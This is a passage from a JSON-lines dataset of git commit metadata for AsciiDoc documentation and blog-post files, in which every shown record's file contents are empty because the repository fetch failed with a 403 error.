ode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c24b2e256b2bac00eef28c227dea2beb0335381d","subject":"Update 2016-09-06-TWCTF.adoc","message":"Update 2016-09-06-TWCTF.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-09-06-TWCTF.adoc","new_file":"_posts\/2016-09-06-TWCTF.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"630ddc5d28b89977a598e6cf5865590ae53e4b7a","subject":"Update 2016-11-17-NSUCRYPTO-2016.adoc","message":"Update 2016-11-17-NSUCRYPTO-2016.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-11-17-NSUCRYPTO-2016.adoc","new_file":"_posts\/2016-11-17-NSUCRYPTO-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fdf56f62681af45f4f3b6ad2e37aeeacbc010157","subject":"changes","message":"changes\n","repos":"frans-fuerst\/thinks,frans-fuerst\/thinks,frans-fuerst\/thinks","old_file":"content\/available\/2015-04-01-13-mind.asciidoc","new_file":"content\/available\/2015-04-01-13-mind.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/frans-fuerst\/thinks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"af71e98a9b28285b82da8b691a336eae34ea7785","subject":"resolving conflicts","message":"resolving conflicts\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch01-setup.adoc","new_file":"developer-tools\/java\/chapters\/ch01-setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"427bd2a473d1c73091171c7aaad18588ee5960e1","subject":"GF debug info","message":"GF debug info\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Glassfish-debug.adoc","new_file":"Glassfish-debug.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"87b36a3ef4d443e4b5d9173072c87a671f6214f6","subject":"Publish 2015-01-31.adoc","message":"Publish 2015-01-31.adoc","repos":"lifengchuan2008\/lifengchuan2008.github.io,lifengchuan2008\/lifengchuan2008.github.io,lifengchuan2008\/lifengchuan2008.github.io,lifengchuan2008\/lifengchuan2008.github.io","old_file":"2015-01-31.adoc","new_file":"2015-01-31.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lifengchuan2008\/lifengchuan2008.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"aa636b5d1bb246b212ee3c9a06168b4f7bbe3a1e","subject":"Issue #970 - Add documentation around transaction usage in Quarkus","message":"Issue #970 - Add documentation around transaction usage in Quarkus\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/transaction-guide.adoc","new_file":"docs\/src\/main\/asciidoc\/transaction-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0a2fcbf78537859d049a919c006ff63388baa6b8","subject":"Update 2016-04-07-Analizando-cabeceras-E-mail.adoc","message":"Update 2016-04-07-Analizando-cabeceras-E-mail.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Analizando-cabeceras-E-mail.adoc","new_file":"_posts\/2016-04-07-Analizando-cabeceras-E-mail.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6cf3d72941f2911da84f1ef0b8492851a97adf77","subject":"y2b create post iPhone 7 - Now Shatter Proof?","message":"y2b create post iPhone 7 - Now Shatter Proof?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-10-22-iPhone-7--Now-Shatter-Proof.adoc","new_file":"_posts\/2016-10-22-iPhone-7--Now-Shatter-Proof.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49f5a4ead7d6288fab3bb5c6f5cccc87798684d2","subject":"Add quote internationalization snippet","message":"Add quote internationalization snippet\n","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-quoteInternationalization.adoc","new_file":"src\/main\/docs\/common-quoteInternationalization.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a9e272329e51a0ebc204fcc59f62ac327bc8b4cb","subject":"forgot that page","message":"forgot that page\n","repos":"feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org","old_file":"pages\/download.adoc","new_file":"pages\/download.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/feelpp\/www.feelpp.org.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a2e7b27838bbdea63e5b05e60f3afe529ef61c58","subject":"Update 2015-05-09-SSL-et-les-banques.adoc","message":"Update 2015-05-09-SSL-et-les-banques.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2015-05-09-SSL-et-les-banques.adoc","new_file":"_posts\/2015-05-09-SSL-et-les-banques.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to 
access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b92a01c6d2d6bbbe99ce904b7e89f68f3b6f3cac","subject":"Update protocol documentation.","message":"Update protocol documentation.\n","repos":"funcool\/postal","old_file":"doc\/proto.adoc","new_file":"doc\/proto.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/funcool\/postal.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"e29bd7e31216a5bcd463012713aa1b4bfc407e7d","subject":"New README for discussion (ref #20)","message":"New README for discussion (ref #20)\n","repos":"ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor","old_file":"workflows\/common\/sh\/README.adoc","new_file":"workflows\/common\/sh\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ECP-CANDLE\/Supervisor.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"852973140d30a022ebfed97529c935fa6c0cf4f0","subject":"add minimal doc","message":"add minimal doc","repos":"nlalevee\/httpant","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nlalevee\/httpant.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3b02690c6e95cc788fa3d2305fbd5e0be6435d68","subject":"Adding README","message":"Adding README\n","repos":"noamt\/bitbucket-asciidoctor-addon,noamt\/bitbucket-asciidoctor-addon","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/noamt\/bitbucket-asciidoctor-addon.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c15a18f2d8daf5c565a6251a6a9a5ee81a1654ef","subject":"Update 2015-07-01-Hybris-modelsjar-not-found.adoc","message":"Update 2015-07-01-Hybris-modelsjar-not-found.adoc","repos":"jlboes\/jlboes.github.io,jlboes\/jlboes.github.io,jlboes\/jlboes.github.io","old_file":"_posts\/2015-07-01-Hybris-modelsjar-not-found.adoc","new_file":"_posts\/2015-07-01-Hybris-modelsjar-not-found.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jlboes\/jlboes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"adc1a6a2004d08cf37d59af5ad30abefc79abd2d","subject":"Added separate section for best practices.","message":"Added separate section for best practices.\n","repos":"CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords","old_file":"docs\/best-practices.adoc","new_file":"docs\/best-practices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CityOfNewYork\/NYCOpenRecords.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"098e9abeec505945675e6273c1d3141457b1adfc","subject":"Update 2017-01-19-Mesaj.adoc","message":"Update 
2017-01-19-Mesaj.adoc","repos":"alick01\/alick01.github.io,alick01\/alick01.github.io,alick01\/alick01.github.io,alick01\/alick01.github.io","old_file":"_posts\/2017-01-19-Mesaj.adoc","new_file":"_posts\/2017-01-19-Mesaj.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alick01\/alick01.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4e291dfc0d16661e667a891a41837480cf395aad","subject":"update readme","message":"update readme\n","repos":"jbosschina\/openshift-cookbooks","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbosschina\/openshift-cookbooks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9fe4db9ba7f503c3c68191df9299f5b994f537a4","subject":"Final 1.0","message":"Final 1.0","repos":"schnawel007\/jsEventBus","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/schnawel007\/jsEventBus.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"90f78b4dcf556e4c326312bbab1e3faae9f126eb","subject":"y2b create post What If You Could Get AirPods For Only $40?","message":"y2b create post What If You Could Get AirPods For Only $40?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-11-WhatIfYouCouldGetAirPodsForOnly40.adoc","new_file":"_posts\/2018-02-11-WhatIfYouCouldGetAirPodsForOnly40.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"376f53ea3f3907e7a3ce56cff949e6528ce80aab","subject":"Add Riviera Pro documentation","message":"Add Riviera Pro documentation\n","repos":"lowRISC\/fusesoc,lowRISC\/fusesoc,olofk\/fusesoc,olofk\/fusesoc","old_file":"doc\/rivierapro.adoc","new_file":"doc\/rivierapro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/olofk\/fusesoc.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"201a0c7aacae70f1ab911ad4994e66c5c2351172","subject":"Update 2015-10-06-Nameless-Free-Loggers-In-Java.adoc","message":"Update 2015-10-06-Nameless-Free-Loggers-In-Java.adoc","repos":"wesamhaboush\/wesamhaboush.github.io,wesamhaboush\/wesamhaboush.github.io,wesamhaboush\/wesamhaboush.github.io","old_file":"_posts\/2015-10-06-Nameless-Free-Loggers-In-Java.adoc","new_file":"_posts\/2015-10-06-Nameless-Free-Loggers-In-Java.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wesamhaboush\/wesamhaboush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ac47c7a97f7fb653eb5125a697f33a5d7c5d604d","subject":"Reflect latest Tree API and styling changes to the documentation","message":"Reflect latest Tree API and styling changes to the 
documentation\n\n","repos":"kironapublic\/vaadin,peterl1084\/framework,peterl1084\/framework,Darsstar\/framework,asashour\/framework,asashour\/framework,asashour\/framework,peterl1084\/framework,peterl1084\/framework,mstahv\/framework,mstahv\/framework,mstahv\/framework,Darsstar\/framework,kironapublic\/vaadin,kironapublic\/vaadin,mstahv\/framework,Darsstar\/framework,mstahv\/framework,kironapublic\/vaadin,asashour\/framework,kironapublic\/vaadin,peterl1084\/framework,Darsstar\/framework,Darsstar\/framework,asashour\/framework","old_file":"documentation\/components\/components-tree.asciidoc","new_file":"documentation\/components\/components-tree.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/peterl1084\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a9bf4f2452619d31025a9d39b1cb74525df9f61a","subject":"Update 2016-02-26-Test.adoc","message":"Update 2016-02-26-Test.adoc","repos":"errorval\/blog,errorval\/blog,errorval\/blog","old_file":"_posts\/2016-02-26-Test.adoc","new_file":"_posts\/2016-02-26-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/errorval\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ac288a2c52a94039042dde436a497db388d9958b","subject":"Renamed '_posts\/2019-01-31-Your-Blog-title.adoc' to '_posts\/2019-01-31-bleh.adoc'","message":"Renamed '_posts\/2019-01-31-Your-Blog-title.adoc' to '_posts\/2019-01-31-bleh.adoc'","repos":"mrfgl\/blog,mrfgl\/blog,mrfgl\/blog,mrfgl\/blog","old_file":"_posts\/2019-01-31-bleh.adoc","new_file":"_posts\/2019-01-31-bleh.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mrfgl\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f40f2b27048326beee2e5ba27d9e3129d18eec79","subject":"Update 2017-01-22-Bismillah.adoc","message":"Update 2017-01-22-Bismillah.adoc","repos":"ktekbiyikiletisim\/ktekbiyikiletisim.github.io,ktekbiyikiletisim\/ktekbiyikiletisim.github.io,ktekbiyikiletisim\/ktekbiyikiletisim.github.io,ktekbiyikiletisim\/ktekbiyikiletisim.github.io","old_file":"_posts\/2017-01-22-Bismillah.adoc","new_file":"_posts\/2017-01-22-Bismillah.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ktekbiyikiletisim\/ktekbiyikiletisim.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f37941b96f6ac1c2d63892c2f063eab6b8d0e6b4","subject":"Update 2018-09-10-Firestore.adoc","message":"Update 2018-09-10-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-10-Firestore.adoc","new_file":"_posts\/2018-09-10-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d70045746ba3f20dedf5faac573dc073db154cb0","subject":"Update 2016-03-15-Using-the-Python-Interpreter.adoc","message":"Update 
2016-03-15-Using-the-Python-Interpreter.adoc","repos":"Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io","old_file":"_posts\/2016-03-15-Using-the-Python-Interpreter.adoc","new_file":"_posts\/2016-03-15-Using-the-Python-Interpreter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Lh4cKg\/Lh4cKg.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a452a9e12074ce83ba07da981b52901d0b42b80d","subject":"Added remove Header EIP docs","message":"Added remove Header EIP docs\n","repos":"davidkarlsen\/camel,Fabryprog\/camel,dmvolod\/camel,pmoerenhout\/camel,kevinearls\/camel,adessaigne\/camel,jonmcewen\/camel,pax95\/camel,DariusX\/camel,apache\/camel,jonmcewen\/camel,christophd\/camel,davidkarlsen\/camel,pax95\/camel,pmoerenhout\/camel,apache\/camel,pax95\/camel,apache\/camel,pax95\/camel,tdiesler\/camel,Fabryprog\/camel,anoordover\/camel,punkhorn\/camel-upstream,objectiser\/camel,pmoerenhout\/camel,akhettar\/camel,gautric\/camel,sverkera\/camel,christophd\/camel,curso007\/camel,nicolaferraro\/camel,curso007\/camel,anoordover\/camel,zregvart\/camel,jonmcewen\/camel,CodeSmell\/camel,snurmine\/camel,adessaigne\/camel,gnodet\/camel,dmvolod\/camel,DariusX\/camel,gautric\/camel,punkhorn\/camel-upstream,adessaigne\/camel,alvinkwekel\/camel,anoordover\/camel,jamesnetherton\/camel,sverkera\/camel,curso007\/camel,DariusX\/camel,akhettar\/camel,onders86\/camel,adessaigne\/camel,pax95\/camel,jonmcewen\/camel,tdiesler\/camel,anoordover\/camel,kevinearls\/camel,objectiser\/camel,anoordover\/camel,tadayosi\/camel,akhettar\/camel,cunningt\/camel,apache\/camel,davidkarlsen\/camel,zregvart\/camel,gautric\/camel,snurmine\/camel,gnodet\/camel,gautric\/camel,akhettar\/camel,nikhilvibhav\/camel,onders86\/camel,adessaigne\/camel,onders86\/camel,cunningt\/camel,christophd\/camel,tadayosi\/camel,apache\/camel,tdiesler\/camel,pmoerenhout\/camel,tadayosi\/camel,sverkera\/camel,nikhilvibhav\/camel,dmvolod\/camel,snurmine\/camel,nikhilvibhav\/camel,CodeSmell\/camel,anoordover\/camel,christophd\/camel,tadayosi\/camel,nicolaferraro\/camel,dmvolod\/camel,onders86\/camel,Fabryprog\/camel,christophd\/camel,jonmcewen\/camel,tdiesler\/camel,cunningt\/camel,ullgren\/camel,gautric\/camel,punkhorn\/camel-upstream,zregvart\/camel,Fabryprog\/camel,cunningt\/camel,snurmine\/camel,jamesnetherton\/camel,nikhilvibhav\/camel,onders86\/camel,nicolaferraro\/camel,cunningt\/camel,tadayosi\/camel,ullgren\/camel,tadayosi\/camel,sverkera\/camel,snurmine\/camel,DariusX\/camel,pmoerenhout\/camel,dmvolod\/camel,ullgren\/camel,mcollovati\/camel,alvinkwekel\/camel,curso007\/camel,kevinearls\/camel,akhettar\/camel,gautric\/camel,jamesnetherton\/camel,gnodet\/camel,mcollovati\/camel,adessaigne\/camel,kevinearls\/camel,nicolaferraro\/camel,gnodet\/camel,punkhorn\/camel-upstream,pax95\/camel,sverkera\/camel,CodeSmell\/camel,tdiesler\/camel,alvinkwekel\/camel,curso007\/camel,akhettar\/camel,mcollovati\/camel,mcollovati\/camel,jamesnetherton\/camel,alvinkwekel\/camel,curso007\/camel,ullgren\/camel,snurmine\/camel,cunningt\/camel,CodeSmell\/camel,zregvart\/camel,sverkera\/camel,kevinearls\/camel,jamesnetherton\/camel,gnodet\/camel,kevinearls\/camel,objectiser\/camel,objectiser\/camel,dmvolod\/camel,tdiesler\/camel,jonmcewen\/camel,davidkarlsen\/camel,apache\/camel,christophd\/camel,onders86\/camel,jamesnetherton\/camel,pmoerenhout\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/removeHeader-eip.adoc","new_file":"
camel-core\/src\/main\/docs\/eips\/removeHeader-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"73b147bd6a94563e6e3bb7dd153b9d70a3589a85","subject":"Update 2016-03-30-Analisis-Paquetes.adoc","message":"Update 2016-03-30-Analisis-Paquetes.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Analisis-Paquetes.adoc","new_file":"_posts\/2016-03-30-Analisis-Paquetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1342b21408b82f8ddc7d6b6ad3ddf708e3d0e7e5","subject":"Update 2015-06-09-JS-ES6-language-features.adoc","message":"Update 2015-06-09-JS-ES6-language-features.adoc","repos":"ragingsmurf\/ragingsmurf.github.io,ragingsmurf\/ragingsmurf.github.io,ragingsmurf\/ragingsmurf.github.io","old_file":"_posts\/2015-06-09-JS-ES6-language-features.adoc","new_file":"_posts\/2015-06-09-JS-ES6-language-features.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ragingsmurf\/ragingsmurf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a3cdf9b67d0b1f9524bed0685429c40ec8e05dcb","subject":"y2b create post The Marshmallow Crossbow","message":"y2b create post The Marshmallow Crossbow","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-11-09-The-Marshmallow-Crossbow.adoc","new_file":"_posts\/2016-11-09-The-Marshmallow-Crossbow.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e81ec34e5f479e98fd5e65a7aad5363ad5915dd7","subject":"Update 2017-03-25-create-pc.adoc","message":"Update 2017-03-25-create-pc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-25-create-pc.adoc","new_file":"_posts\/2017-03-25-create-pc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee2a024e1e3221e78ff340101a4becf715545a93","subject":"Update example in order to prevent confusion","message":"Update example in order to prevent confusion\n","repos":"uclouvain\/OSIS-Louvain,uclouvain\/osis_louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis,uclouvain\/osis,uclouvain\/osis_louvain","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} 
{"commit":"ed019edd8e84fa1e7aff4e0ef356a046b99b184e","subject":"Formatting changes","message":"Formatting changes\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"week02.asciidoc","new_file":"week02.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"65c9e1fb56f994a43d6dd4a4249f229c32d63282","subject":"Add release notes for release 2.22.5","message":"Add release notes for release 2.22.5\n","repos":"mcollovati\/camel,christophd\/camel,tadayosi\/camel,tdiesler\/camel,adessaigne\/camel,gnodet\/camel,alvinkwekel\/camel,DariusX\/camel,pmoerenhout\/camel,Fabryprog\/camel,apache\/camel,apache\/camel,davidkarlsen\/camel,davidkarlsen\/camel,davidkarlsen\/camel,nikhilvibhav\/camel,nicolaferraro\/camel,apache\/camel,Fabryprog\/camel,pmoerenhout\/camel,pax95\/camel,tdiesler\/camel,zregvart\/camel,tdiesler\/camel,apache\/camel,ullgren\/camel,CodeSmell\/camel,adessaigne\/camel,tadayosi\/camel,tdiesler\/camel,Fabryprog\/camel,ullgren\/camel,christophd\/camel,objectiser\/camel,ullgren\/camel,cunningt\/camel,pax95\/camel,ullgren\/camel,pax95\/camel,nicolaferraro\/camel,cunningt\/camel,christophd\/camel,CodeSmell\/camel,objectiser\/camel,gnodet\/camel,zregvart\/camel,mcollovati\/camel,mcollovati\/camel,alvinkwekel\/camel,CodeSmell\/camel,tadayosi\/camel,mcollovati\/camel,pax95\/camel,tdiesler\/camel,nicolaferraro\/camel,nikhilvibhav\/camel,adessaigne\/camel,CodeSmell\/camel,adessaigne\/camel,cunningt\/camel,pmoerenhout\/camel,pmoerenhout\/camel,tdiesler\/camel,pax95\/camel,nikhilvibhav\/camel,cunningt\/camel,apache\/camel,cunningt\/camel,tadayosi\/camel,tadayosi\/camel,cunningt\/camel,DariusX\/camel,christophd\/camel,nicolaferraro\/camel,zregvart\/camel,objectiser\/camel,pax95\/camel,pmoerenhout\/camel,gnodet\/camel,pmoerenhout\/camel,christophd\/camel,christophd\/camel,apache\/camel,DariusX\/camel,adessaigne\/camel,davidkarlsen\/camel,Fabryprog\/camel,zregvart\/camel,nikhilvibhav\/camel,tadayosi\/camel,objectiser\/camel,alvinkwekel\/camel,gnodet\/camel,adessaigne\/camel,alvinkwekel\/camel,DariusX\/camel,gnodet\/camel","old_file":"docs\/user-manual\/en\/release-notes\/camel-2225-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2225-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"21535e9c6ebd312e038fd1061af4fe05f3528ae2","subject":"Back to GF 4","message":"Back to GF 4\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"App servers from Eclipse.adoc","new_file":"App servers from Eclipse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc612884f2b32a8bd2ecde79c2231bffa7f23f99","subject":"Update 2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","message":"Update 
2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","repos":"jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io","old_file":"_posts\/2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","new_file":"_posts\/2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jtsiros\/jtsiros.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e22695080e26305ef3b7b5b11f9dfb4072c4ec64","subject":"Update 2017-01-09-TWCTF-2017-BabyDLP-BabyRSA-3.adoc","message":"Update 2017-01-09-TWCTF-2017-BabyDLP-BabyRSA-3.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-01-09-TWCTF-2017-BabyDLP-BabyRSA-3.adoc","new_file":"_posts\/2017-01-09-TWCTF-2017-BabyDLP-BabyRSA-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"870fa395719ff7c653450b8f9797874b307a0c8e","subject":"CIP20150217 Dynamic Property Lookup","message":"CIP20150217 Dynamic Property Lookup\n\nIt has been requested by users to be able to lookup the key of an entity\nor a map using a dynamically computed String value as the key.\nCurrently Cypher does not provide this. This CIP suggests the\nintroduction of new syntax 